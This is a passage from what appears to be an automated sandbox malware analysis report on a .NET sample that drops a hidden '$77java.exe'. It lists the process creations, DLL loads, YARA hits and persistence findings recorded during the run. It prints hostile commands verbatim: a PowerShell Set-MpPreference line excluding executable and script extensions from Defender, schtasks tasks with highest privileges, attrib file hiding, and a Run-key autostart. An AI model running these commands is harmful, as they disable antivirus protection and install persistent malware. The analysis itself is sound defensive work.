                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\java"Jump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\java\$77java.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4B52.tmp.bat""Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\java\$77java.exe "C:\Users\user\java\$77java.exe" Jump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77java.exeJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /Create /SC ONCE /TN "$77java.exe" /TR "C:\Users\user\java\$77java.exe \"\$77java.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHESTJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77java.exeJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exitJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "java_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00Jump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: mscoree.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: version.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: wbemcomn.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: wininet.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: winhttp.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: mswsock.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: winnsi.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: propsys.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: edputil.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: srvcli.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: netutils.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: appresolver.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: bcp47langs.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: slc.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: sppc.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll
                  Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
                  Source: C:\Windows\System32\timeout.exe | Section loaded: version.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: mscoree.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: version.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: msasn1.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: wbemcomn.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: amsi.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: wininet.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: iertutil.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: winhttp.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: mswsock.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: winnsi.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: propsys.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: edputil.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: urlmon.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: srvcli.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: netutils.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: wintypes.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: appresolver.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: bcp47langs.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: slc.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: sppc.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: rasapi32.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: rasman.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: rtutils.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: dnsapi.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: rasadhlp.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: secur32.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: schannel.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: mskeyprotect.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: ntasn1.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: ncrypt.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: ncryptsslp.dll
                  Source: C:\Users\user\java\$77java.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
                  Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                  Source: Window Recorder | Window detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: RLesaPFXew.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: RLesaPFXew.exe | Static PE information: Image base 0x140000000 > 0x60000000
                  Source: RLesaPFXew.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  Source: RLesaPFXew.exe, MessageRead.cs | .Net Code: RecoveryData System.Reflection.Assembly.Load(byte[])
                  Source: $77java.exe.0.dr, MessageRead.cs | .Net Code: RecoveryData System.Reflection.Assembly.Load(byte[])

                  Persistence and Installation Behavior

                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Process created: attrib.exe
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | File created: C:\Users\user\java\$77java.exe

                  Boot Survival

                  Source: Yara match | File source: RLesaPFXew.exe, type: SAMPLE
                  Source: Yara match | File source: 0.0.RLesaPFXew.exe.1d0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RLesaPFXew.exe.3af8618.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RLesaPFXew.exe.3af8618.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000000.00000000.2129565272.00000000001D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.2158375099.0000000003AE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: RLesaPFXew.exe PID: 5576, type: MEMORYSTR
                  Source: Yara match | File source: C:\Users\user\java\$77java.exe, type: DROPPED
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NULL "C:\Users\user\java\$77java.exe"
                  Source: C:\Users\user\java\$77java.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77java.exe
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NULL

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\java\$77java.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\java\$77java.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\java\$77java.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
